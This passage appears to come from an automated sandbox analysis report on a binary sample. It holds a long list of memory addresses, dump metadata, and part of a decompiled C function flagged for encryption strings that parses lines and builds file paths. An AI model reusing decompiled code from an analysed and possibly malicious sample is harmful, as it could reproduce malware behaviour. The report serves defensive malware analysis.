                                                                                                                                                  0x6770a08b
                                                                                                                                                  0x6770a08b
                                                                                                                                                  0x6770a085
                                                                                                                                                  0x6770a07f
                                                                                                                                                  0x6770a079
                                                                                                                                                  0x6770a073
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770a06d
                                                                                                                                                  0x67709850
                                                                                                                                                  0x67709850
                                                                                                                                                  0x67709852
                                                                                                                                                  0x6770a030
                                                                                                                                                  0x6770a034
                                                                                                                                                  0x6770a055
                                                                                                                                                  0x6770a05c
                                                                                                                                                  0x6770a060
                                                                                                                                                  0x6770a060
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770a060
                                                                                                                                                  0x6770a036
                                                                                                                                                  0x6770a039
                                                                                                                                                  0x6770a03d
                                                                                                                                                  0x6770a041
                                                                                                                                                  0x6770a043
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770a049
                                                                                                                                                  0x6770a04d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770a04d
                                                                                                                                                  0x67709858
                                                                                                                                                  0x67709858
                                                                                                                                                  0x6770985a
                                                                                                                                                  0x6770a026
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770a026
                                                                                                                                                  0x67709860
                                                                                                                                                  0x67709860
                                                                                                                                                  0x67709862
                                                                                                                                                  0x67709fe9
                                                                                                                                                  0x67709fed
                                                                                                                                                  0x6770a00f
                                                                                                                                                  0x6770a01a
                                                                                                                                                  0x67709fef
                                                                                                                                                  0x67709fef
                                                                                                                                                  0x67709ff2
                                                                                                                                                  0x67709ff6
                                                                                                                                                  0x67709ffa
                                                                                                                                                  0x67709ffc
                                                                                                                                                  0x6770a002
                                                                                                                                                  0x6770a005
                                                                                                                                                  0x6770a005
                                                                                                                                                  0x67709ffc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709fed
                                                                                                                                                  0x67709868
                                                                                                                                                  0x67709868
                                                                                                                                                  0x6770986a
                                                                                                                                                  0x67709ed9
                                                                                                                                                  0x67709edd
                                                                                                                                                  0x67709f1c
                                                                                                                                                  0x67709f1e
                                                                                                                                                  0x67709f23
                                                                                                                                                  0x67709f25
                                                                                                                                                  0x67709f3b
                                                                                                                                                  0x67709f3b
                                                                                                                                                  0x67709f3d
                                                                                                                                                  0x67709f53
                                                                                                                                                  0x67709f53
                                                                                                                                                  0x67709f55
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709f5b
                                                                                                                                                  0x67709f5d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709f63
                                                                                                                                                  0x67709f65
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709f6b
                                                                                                                                                  0x67709f6d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709f73
                                                                                                                                                  0x67709f75
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709f7b
                                                                                                                                                  0x67709f7d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709f83
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709f83
                                                                                                                                                  0x67709f3f
                                                                                                                                                  0x67709f43
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709f45
                                                                                                                                                  0x67709f49
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709f49
                                                                                                                                                  0x67709f27
                                                                                                                                                  0x67709f2b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709f2d
                                                                                                                                                  0x67709f31
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709f31
                                                                                                                                                  0x67709edf
                                                                                                                                                  0x67709ee3
                                                                                                                                                  0x67709f13
                                                                                                                                                  0x67709ee5
                                                                                                                                                  0x67709ee5
                                                                                                                                                  0x67709ee9
                                                                                                                                                  0x67709ef8
                                                                                                                                                  0x67709efb
                                                                                                                                                  0x67709f0a
                                                                                                                                                  0x67709efd
                                                                                                                                                  0x67709efd
                                                                                                                                                  0x67709f00
                                                                                                                                                  0x67709f00
                                                                                                                                                  0x67709eeb
                                                                                                                                                  0x67709eeb
                                                                                                                                                  0x67709eef
                                                                                                                                                  0x67709ef1
                                                                                                                                                  0x67709ef1
                                                                                                                                                  0x67709eef
                                                                                                                                                  0x67709ee9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709ee3
                                                                                                                                                  0x67709870
                                                                                                                                                  0x67709870
                                                                                                                                                  0x67709872
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709878
                                                                                                                                                  0x6770987c
                                                                                                                                                  0x6770987f
                                                                                                                                                  0x677099f8
                                                                                                                                                  0x677099fb
                                                                                                                                                  0x67709d04
                                                                                                                                                  0x67709d04
                                                                                                                                                  0x67709d09
                                                                                                                                                  0x67709e4e
                                                                                                                                                  0x67709e4e
                                                                                                                                                  0x67709e52
                                                                                                                                                  0x67709e55
                                                                                                                                                  0x67709e5a
                                                                                                                                                  0x67709e5f
                                                                                                                                                  0x67709e5f
                                                                                                                                                  0x67709e62
                                                                                                                                                  0x67709e62
                                                                                                                                                  0x67709e66
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709e66
                                                                                                                                                  0x67709d0f
                                                                                                                                                  0x67709d13
                                                                                                                                                  0x67709d46
                                                                                                                                                  0x67709d46
                                                                                                                                                  0x67709d4a
                                                                                                                                                  0x67709d4a
                                                                                                                                                  0x67709d4f
                                                                                                                                                  0x67709d54
                                                                                                                                                  0x67709d59
                                                                                                                                                  0x67709d5c
                                                                                                                                                  0x67709d60
                                                                                                                                                  0x67709d6d
                                                                                                                                                  0x67709d6f
                                                                                                                                                  0x67709d6f
                                                                                                                                                  0x67709d83
                                                                                                                                                  0x67709d88
                                                                                                                                                  0x67709d8c
                                                                                                                                                  0x67709d8e
                                                                                                                                                  0x67709d92
                                                                                                                                                  0x67709d99
                                                                                                                                                  0x67709d9c
                                                                                                                                                  0x67709d9f
                                                                                                                                                  0x67709da1
                                                                                                                                                  0x67709da1
                                                                                                                                                  0x67709d92
                                                                                                                                                  0x67709da6
                                                                                                                                                  0x67709dac
                                                                                                                                                  0x67709db0
                                                                                                                                                  0x67709e10
                                                                                                                                                  0x67709e1d
                                                                                                                                                  0x67709e22
                                                                                                                                                  0x67709e22
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709db2
                                                                                                                                                  0x67709db2
                                                                                                                                                  0x67709db4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709db6
                                                                                                                                                  0x67709db9
                                                                                                                                                  0x67709db9
                                                                                                                                                  0x67709dc8
                                                                                                                                                  0x67709dce
                                                                                                                                                  0x67709dd0
                                                                                                                                                  0x67709dd4
                                                                                                                                                  0x67709dd9
                                                                                                                                                  0x67709ddc
                                                                                                                                                  0x67709dde
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709de0
                                                                                                                                                  0x67709de3
                                                                                                                                                  0x67709de5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709de7
                                                                                                                                                  0x67709df8
                                                                                                                                                  0x67709dfd
                                                                                                                                                  0x67709e00
                                                                                                                                                  0x67709e02
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709e25
                                                                                                                                                  0x67709e25
                                                                                                                                                  0x67709e29
                                                                                                                                                  0x67709e29
                                                                                                                                                  0x67709e2b
                                                                                                                                                  0x67709e2d
                                                                                                                                                  0x67709e31
                                                                                                                                                  0x67709e33
                                                                                                                                                  0x67709e3d
                                                                                                                                                  0x67709e40
                                                                                                                                                  0x67709e42
                                                                                                                                                  0x67709e47
                                                                                                                                                  0x67709e4b
                                                                                                                                                  0x67709e4b
                                                                                                                                                  0x67709e4b
                                                                                                                                                  0x67709e31
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709e2b
                                                                                                                                                  0x67709e06
                                                                                                                                                  0x67709e09
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709e09
                                                                                                                                                  0x67709db0
                                                                                                                                                  0x67709d15
                                                                                                                                                  0x67709d1a
                                                                                                                                                  0x67709d23
                                                                                                                                                  0x67709d27
                                                                                                                                                  0x67709d39
                                                                                                                                                  0x67709d3d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709d3f
                                                                                                                                                  0x67709d2e
                                                                                                                                                  0x67709d2e
                                                                                                                                                  0x67709d33
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709d33
                                                                                                                                                  0x67709d29
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709d29
                                                                                                                                                  0x67709d1c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709d1c
                                                                                                                                                  0x67709a01
                                                                                                                                                  0x67709a04
                                                                                                                                                  0x677099d8
                                                                                                                                                  0x677099d8
                                                                                                                                                  0x677099dc
                                                                                                                                                  0x677099e0
                                                                                                                                                  0x677099e3
                                                                                                                                                  0x677099e5
                                                                                                                                                  0x67709c09
                                                                                                                                                  0x67709c1b
                                                                                                                                                  0x67709c1e
                                                                                                                                                  0x67709c22
                                                                                                                                                  0x67709c26
                                                                                                                                                  0x67709c2c
                                                                                                                                                  0x67709c2e
                                                                                                                                                  0x67709c37
                                                                                                                                                  0x67709c3c
                                                                                                                                                  0x67709c40
                                                                                                                                                  0x67709c43
                                                                                                                                                  0x67709c4c
                                                                                                                                                  0x67709c45
                                                                                                                                                  0x67709c45
                                                                                                                                                  0x67709c48
                                                                                                                                                  0x67709c48
                                                                                                                                                  0x67709c43
                                                                                                                                                  0x67709c0b
                                                                                                                                                  0x67709c0b
                                                                                                                                                  0x67709c0f
                                                                                                                                                  0x67709c11
                                                                                                                                                  0x67709c11
                                                                                                                                                  0x67709c0f
                                                                                                                                                  0x677099eb
                                                                                                                                                  0x677099eb
                                                                                                                                                  0x677099eb
                                                                                                                                                  0x67709c54
                                                                                                                                                  0x67709c5e
                                                                                                                                                  0x67709c66
                                                                                                                                                  0x67709c69
                                                                                                                                                  0x67709c6d
                                                                                                                                                  0x67709c77
                                                                                                                                                  0x67709c7a
                                                                                                                                                  0x67709c83
                                                                                                                                                  0x67709c86
                                                                                                                                                  0x67709c8a
                                                                                                                                                  0x67709c91
                                                                                                                                                  0x67709c99
                                                                                                                                                  0x67709c9e
                                                                                                                                                  0x67709c9e
                                                                                                                                                  0x67709ca4
                                                                                                                                                  0x67709ca6
                                                                                                                                                  0x67709ca8
                                                                                                                                                  0x67709cac
                                                                                                                                                  0x67709cb5
                                                                                                                                                  0x67709cc2
                                                                                                                                                  0x67709cc2
                                                                                                                                                  0x67709cac
                                                                                                                                                  0x67709cc4
                                                                                                                                                  0x67709cc8
                                                                                                                                                  0x67709cca
                                                                                                                                                  0x67709ccc
                                                                                                                                                  0x67709cd5
                                                                                                                                                  0x67709ce2
                                                                                                                                                  0x67709ce2
                                                                                                                                                  0x67709ccc
                                                                                                                                                  0x67709ce4
                                                                                                                                                  0x67709ce7
                                                                                                                                                  0x67709ce9
                                                                                                                                                  0x67709cee
                                                                                                                                                  0x67709cee
                                                                                                                                                  0x67709cee
                                                                                                                                                  0x67709cf4
                                                                                                                                                  0x67709cf9
                                                                                                                                                  0x67709cfd
                                                                                                                                                  0x67709cfd
                                                                                                                                                  0x67709cfd
                                                                                                                                                  0x67709d00
                                                                                                                                                  0x67709d00
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709d00
                                                                                                                                                  0x67709a06
                                                                                                                                                  0x67709a09
                                                                                                                                                  0x67709af9
                                                                                                                                                  0x67709af9
                                                                                                                                                  0x67709af9
                                                                                                                                                  0x67709afd
                                                                                                                                                  0x67709afd
                                                                                                                                                  0x67709b03
                                                                                                                                                  0x67709b03
                                                                                                                                                  0x67709b07
                                                                                                                                                  0x67709b07
                                                                                                                                                  0x67709b0c
                                                                                                                                                  0x67709b0f
                                                                                                                                                  0x67709b18
                                                                                                                                                  0x67709b18
                                                                                                                                                  0x67709b1b
                                                                                                                                                  0x67709b4f
                                                                                                                                                  0x67709b4f
                                                                                                                                                  0x67709b53
                                                                                                                                                  0x67709b55
                                                                                                                                                  0x67709b58
                                                                                                                                                  0x67709b5a
                                                                                                                                                  0x67709b5d
                                                                                                                                                  0x67709b5d
                                                                                                                                                  0x67709b58
                                                                                                                                                  0x67709b62
                                                                                                                                                  0x67709b65
                                                                                                                                                  0x67709b67
                                                                                                                                                  0x67709b6c
                                                                                                                                                  0x67709b6c
                                                                                                                                                  0x67709b6c
                                                                                                                                                  0x67709b71
                                                                                                                                                  0x67709b73
                                                                                                                                                  0x67709b7c
                                                                                                                                                  0x67709b80
                                                                                                                                                  0x67709b83
                                                                                                                                                  0x67709b75
                                                                                                                                                  0x67709b75
                                                                                                                                                  0x67709b75
                                                                                                                                                  0x67709b87
                                                                                                                                                  0x67709b8e
                                                                                                                                                  0x67709b98
                                                                                                                                                  0x67709b9a
                                                                                                                                                  0x67709b9a
                                                                                                                                                  0x67709b9c
                                                                                                                                                  0x67709ba0
                                                                                                                                                  0x67709ba0
                                                                                                                                                  0x67709ba2
                                                                                                                                                  0x67709ba4
                                                                                                                                                  0x67709ba6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709ba8
                                                                                                                                                  0x67709ba8
                                                                                                                                                  0x67709bab
                                                                                                                                                  0x67709bcc
                                                                                                                                                  0x67709bd7
                                                                                                                                                  0x67709bdb
                                                                                                                                                  0x67709bdd
                                                                                                                                                  0x67709be0
                                                                                                                                                  0x67709be4
                                                                                                                                                  0x67709be7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709bed
                                                                                                                                                  0x67709bef
                                                                                                                                                  0x67709bfa
                                                                                                                                                  0x67709bfa
                                                                                                                                                  0x67709bfd
                                                                                                                                                  0x67709c01
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709c01
                                                                                                                                                  0x67709bf1
                                                                                                                                                  0x67709bf4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709bf4
                                                                                                                                                  0x67709bad
                                                                                                                                                  0x67709bb5
                                                                                                                                                  0x67709bbb
                                                                                                                                                  0x67709bbb
                                                                                                                                                  0x67709bbe
                                                                                                                                                  0x67709bc1
                                                                                                                                                  0x67709bc3
                                                                                                                                                  0x67709bc3
                                                                                                                                                  0x67709bc3
                                                                                                                                                  0x67709bc5
                                                                                                                                                  0x67709bc7
                                                                                                                                                  0x67709ba0
                                                                                                                                                  0x67709ba2
                                                                                                                                                  0x67709ba4
                                                                                                                                                  0x67709ba6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709ba6
                                                                                                                                                  0x67709ba0
                                                                                                                                                  0x67709b11
                                                                                                                                                  0x67709b16
                                                                                                                                                  0x67709b21
                                                                                                                                                  0x67709b25
                                                                                                                                                  0x67709b29
                                                                                                                                                  0x67709b3f
                                                                                                                                                  0x67709b43
                                                                                                                                                  0x67709b4b
                                                                                                                                                  0x67709b45
                                                                                                                                                  0x67709b45
                                                                                                                                                  0x67709b45
                                                                                                                                                  0x67709b2b
                                                                                                                                                  0x67709b2b
                                                                                                                                                  0x67709b2f
                                                                                                                                                  0x67709b38
                                                                                                                                                  0x67709b31
                                                                                                                                                  0x67709b31
                                                                                                                                                  0x67709b31
                                                                                                                                                  0x67709b2f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709b29
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709b16
                                                                                                                                                  0x67709a0f
                                                                                                                                                  0x67709a12
                                                                                                                                                  0x67709ac8
                                                                                                                                                  0x67709acb
                                                                                                                                                  0x67709acf
                                                                                                                                                  0x67709ad4
                                                                                                                                                  0x67709ad7
                                                                                                                                                  0x67709ad9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709adf
                                                                                                                                                  0x67709ae3
                                                                                                                                                  0x67709aea
                                                                                                                                                  0x67709ae5
                                                                                                                                                  0x67709ae5
                                                                                                                                                  0x67709ae5
                                                                                                                                                  0x67709aec
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709aec
                                                                                                                                                  0x67709a18
                                                                                                                                                  0x67709a1b
                                                                                                                                                  0x67709ab8
                                                                                                                                                  0x67709abe
                                                                                                                                                  0x67709ac1
                                                                                                                                                  0x67709ac3
                                                                                                                                                  0x67709ac3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709ac1
                                                                                                                                                  0x67709a21
                                                                                                                                                  0x67709a24
                                                                                                                                                  0x67709a89
                                                                                                                                                  0x67709a8e
                                                                                                                                                  0x67709a93
                                                                                                                                                  0x67709a93
                                                                                                                                                  0x67709a98
                                                                                                                                                  0x67709a98
                                                                                                                                                  0x67709a9c
                                                                                                                                                  0x67709aa2
                                                                                                                                                  0x67709aa5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709aa9
                                                                                                                                                  0x67709aae
                                                                                                                                                  0x67709ab2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709ab2
                                                                                                                                                  0x67709a26
                                                                                                                                                  0x67709a29
                                                                                                                                                  0x67709936
                                                                                                                                                  0x67709936
                                                                                                                                                  0x67709939
                                                                                                                                                  0x67709943
                                                                                                                                                  0x67709946
                                                                                                                                                  0x6770994a
                                                                                                                                                  0x67709951
                                                                                                                                                  0x67709a60
                                                                                                                                                  0x67709a63
                                                                                                                                                  0x67709a6b
                                                                                                                                                  0x67709a7a
                                                                                                                                                  0x67709a7a
                                                                                                                                                  0x67709a7c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709a70
                                                                                                                                                  0x67709a72
                                                                                                                                                  0x67709a75
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709a77
                                                                                                                                                  0x67709a77
                                                                                                                                                  0x67709a77
                                                                                                                                                  0x67709a7e
                                                                                                                                                  0x67709a7e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709957
                                                                                                                                                  0x67709957
                                                                                                                                                  0x6770995a
                                                                                                                                                  0x67709962
                                                                                                                                                  0x6770996a
                                                                                                                                                  0x67709a54
                                                                                                                                                  0x67709a54
                                                                                                                                                  0x67709a56
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709a48
                                                                                                                                                  0x67709a4a
                                                                                                                                                  0x67709a4e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709a50
                                                                                                                                                  0x67709a50
                                                                                                                                                  0x67709a50
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709a50
                                                                                                                                                  0x67709a4e
                                                                                                                                                  0x67709a80
                                                                                                                                                  0x67709a80
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709a80
                                                                                                                                                  0x67709951
                                                                                                                                                  0x67709a2f
                                                                                                                                                  0x67709a32
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709a38
                                                                                                                                                  0x67709a3b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709a41
                                                                                                                                                  0x67709a41
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709a41
                                                                                                                                                  0x67709a3b
                                                                                                                                                  0x67709885
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770988b
                                                                                                                                                  0x6770988e
                                                                                                                                                  0x677099cc
                                                                                                                                                  0x677099cc
                                                                                                                                                  0x677099d4
                                                                                                                                                  0x677099d4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677099d4
                                                                                                                                                  0x67709894
                                                                                                                                                  0x67709897
                                                                                                                                                  0x67709972
                                                                                                                                                  0x67709979
                                                                                                                                                  0x6770997b
                                                                                                                                                  0x6770997b
                                                                                                                                                  0x67709980
                                                                                                                                                  0x67709980
                                                                                                                                                  0x67709984
                                                                                                                                                  0x6770998b
                                                                                                                                                  0x677099b8
                                                                                                                                                  0x677099c0
                                                                                                                                                  0x6770998d
                                                                                                                                                  0x6770998d
                                                                                                                                                  0x6770999b
                                                                                                                                                  0x6770999e
                                                                                                                                                  0x677099a3
                                                                                                                                                  0x677099a6
                                                                                                                                                  0x677099a8
                                                                                                                                                  0x677099aa
                                                                                                                                                  0x677099aa
                                                                                                                                                  0x677099a8
                                                                                                                                                  0x677099c3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677099c3
                                                                                                                                                  0x6770989d
                                                                                                                                                  0x677098a0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677098a6
                                                                                                                                                  0x677098a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677098af
                                                                                                                                                  0x677098b2
                                                                                                                                                  0x67709928
                                                                                                                                                  0x6770992f
                                                                                                                                                  0x67709931
                                                                                                                                                  0x67709931
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770992f
                                                                                                                                                  0x677098b4
                                                                                                                                                  0x677098b7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677098bd
                                                                                                                                                  0x677098c0
                                                                                                                                                  0x677098d9
                                                                                                                                                  0x677098dc
                                                                                                                                                  0x677098e0
                                                                                                                                                  0x677098e3
                                                                                                                                                  0x67709914
                                                                                                                                                  0x67709914
                                                                                                                                                  0x6770991e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770991e
                                                                                                                                                  0x677098e5
                                                                                                                                                  0x677098e9
                                                                                                                                                  0x677098ec
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677098ee
                                                                                                                                                  0x677098ee
                                                                                                                                                  0x677098f1
                                                                                                                                                  0x677098f6
                                                                                                                                                  0x6770990a
                                                                                                                                                  0x677098f8
                                                                                                                                                  0x677098f8
                                                                                                                                                  0x677098f9
                                                                                                                                                  0x67709903
                                                                                                                                                  0x67709903
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677098f6
                                                                                                                                                  0x677098ec
                                                                                                                                                  0x677098c2
                                                                                                                                                  0x677098c5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677098cb
                                                                                                                                                  0x677098ce
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677098d4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677098d4
                                                                                                                                                  0x677098ce
                                                                                                                                                  0x67709e8d
                                                                                                                                                  0x67709e90
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709e92
                                                                                                                                                  0x67709e96
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709e96
                                                                                                                                                  0x677097cd
                                                                                                                                                  0x67709707
                                                                                                                                                  0x6770970c
                                                                                                                                                  0x67709713
                                                                                                                                                  0x67709716
                                                                                                                                                  0x67709740
                                                                                                                                                  0x67709740
                                                                                                                                                  0x67709743
                                                                                                                                                  0x6770974a
                                                                                                                                                  0x6770974a
                                                                                                                                                  0x6770974f
                                                                                                                                                  0x67709751
                                                                                                                                                  0x67709754
                                                                                                                                                  0x67709756
                                                                                                                                                  0x67709759
                                                                                                                                                  0x6770975b
                                                                                                                                                  0x67709761
                                                                                                                                                  0x67709764
                                                                                                                                                  0x6770976c
                                                                                                                                                  0x6770976c
                                                                                                                                                  0x6770976c
                                                                                                                                                  0x67709759
                                                                                                                                                  0x67709774
                                                                                                                                                  0x67709778
                                                                                                                                                  0x677097a6
                                                                                                                                                  0x677097a6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677097a6
                                                                                                                                                  0x67709778
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770974f
                                                                                                                                                  0x67709718
                                                                                                                                                  0x6770971b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770971d
                                                                                                                                                  0x67709720
                                                                                                                                                  0x6770972a
                                                                                                                                                  0x67709736
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709736
                                                                                                                                                  0x677096c3
                                                                                                                                                  0x677096c3
                                                                                                                                                  0x677096c8
                                                                                                                                                  0x677096ce
                                                                                                                                                  0x677096d3
                                                                                                                                                  0x677096da
                                                                                                                                                  0x677096e0
                                                                                                                                                  0x677096e0
                                                                                                                                                  0x67709eaf
                                                                                                                                                  0x67709ed8
                                                                                                                                                  0x67709ed8

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: write_multi_char$_errno_invalid_parameter_noinfowrite_char$_fileno_getptdfree
                                                                                                                                                  • String ID: $@
                                                                                                                                                  • API String ID: 1084558760-1077428164
                                                                                                                                                  • Opcode ID: c3718e0bcc3124c2dd11f3a5ee4291f08470b829b49a15b3c4717895cc5357fe
                                                                                                                                                  • Instruction ID: 200a1073b19c218cc4ecc26327d2edc40d50240c5be890c7e321df56d84a90d5
                                                                                                                                                  • Opcode Fuzzy Hash: c3718e0bcc3124c2dd11f3a5ee4291f08470b829b49a15b3c4717895cc5357fe
                                                                                                                                                  • Instruction Fuzzy Hash: F54203F361C68086EB108B68D7443AEBBF5F7AE798F141825DB99476A4D739C851CF00
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67702804, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 248encryptionstringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                  			E67702804(void* __ecx, signed long long __edi, void* __esp, long long __rbx, long long __rcx, long long __rdx, void* __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				int _t66;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t76;
				void* _t87;
				signed long long _t94;
				void* _t95;
				void* _t118;
				void* _t119;
				void* _t123;
				void* _t124;
				signed long long _t132;
				signed long long _t133;
				signed long long _t136;
				signed long long _t139;
				signed long long _t141;
				intOrPtr _t156;
				signed long long _t163;
				signed long long _t169;
				signed long long _t180;
				long long _t198;
				signed long long _t199;
				signed long long _t202;
				void* _t205;
				signed long long _t207;
				signed long long _t208;
				signed long long _t209;
				void* _t213;
				signed long long _t214;
				void* _t222;
				signed long long _t226;
				void* _t231;
				long long _t234;
				signed long long _t236;
				CHAR* _t237;
				long long _t238;

				_t137 = __rbx;
				_t123 = __esp;
				_t116 = __edi;
				_t98 = __ecx;
				 *((long long*)(_t213 + 0x18)) = __rbx;
				_push(_t205);
				_push(_t226);
				_t211 = _t213 - 0x900;
				_t214 = _t213 - 0xa00;
				_t132 =  *0x67716000; // 0x9b7b11e8241
				_t133 = _t132 ^ _t214;
				 *(_t213 - 0x900 + 0x8f0) = _t133;
				_t234 = __rdx;
				 *((long long*)(_t214 + 0x50)) = __rdx;
				_t198 = __rcx;
				 *((long long*)(_t214 + 0x60)) = __rcx;
				E6770334C(__ecx, __edi, __esp, __rbx, __rcx, _t205, __r8);
				 *(_t214 + 0x58) = _t133;
				_t238 = _t198;
				_t66 = lstrlenA(_t237);
				r12d = 0;
				 *(_t214 + 0x40) = _t66;
				_t8 = _t226 + 0x10; // 0x10
				E67703938(_t8, __esp, _t133, _t137, 0x67713018, _t205, __r8);
				 *(_t214 + 0x48) = _t133;
				_t68 = E67703938(0x114, __esp, _t133, _t133, 0x67712f00, _t205, __r8);
				_t199 = _t133;
				E67704688(_t68, _t98, 0x114, _t133, _t133, _t133, _t222);
				_t229 = _t133;
				 *(_t214 + 0x30) = _t133;
				_t70 = E677039E8(_t116, __esp, _t133, _t133, _t199, _t199);
				while(1) {
					_t71 = E67707758(_t70, _t238, "\n");
					_t139 = _t133;
					if(_t133 == 0) {
						break;
					}
					_t118 = _t71 - r15d;
					_t11 = _t199 + 1; // 0x1
					malloc(??);
					_t207 = _t133;
					 *((intOrPtr*)(_t118 + _t133)) = r12b;
					_t76 = E6770ED80(_t11, _t133, _t238, _t118);
					_t13 = _t139 + 1; // 0x1
					_t238 = _t13;
					_t141 = "/";
					_t202 = _t226;
					_t156 = _t234;
					while(1) {
						_t188 = _t141;
						_t76 = E67707758(_t76, _t156, _t141);
						if(_t133 == 0) {
							break;
						}
						_t202 = _t133;
						_t14 = _t133 + 1; // 0x1
						_t156 = _t14;
					}
					_t16 = _t202 - _t234 + 1; // 0x1
					E67707FA0(_t133, _t211 + 0x3a0, _t188, _t234, _t16);
					_t224 =  *(_t214 + 0x58);
					 *(_t214 + 0x28) = _t207;
					 *(_t214 + 0x20) = _t141;
					E6770717C("%s%s%s",  *(_t214 + 0x58));
					free(??);
					E677070DC(_t133, _t211 + 0x3a0, _t188, _t214 + 0x70);
					r8d = 0;
					E67705440(0, _t123, _t141, _t211 + 0x3a0, _t188, _t214 + 0x70);
					_t236 = _t133;
					memset(_t118, 0, 0x54b << 0);
					_t124 = _t123 + 0xc;
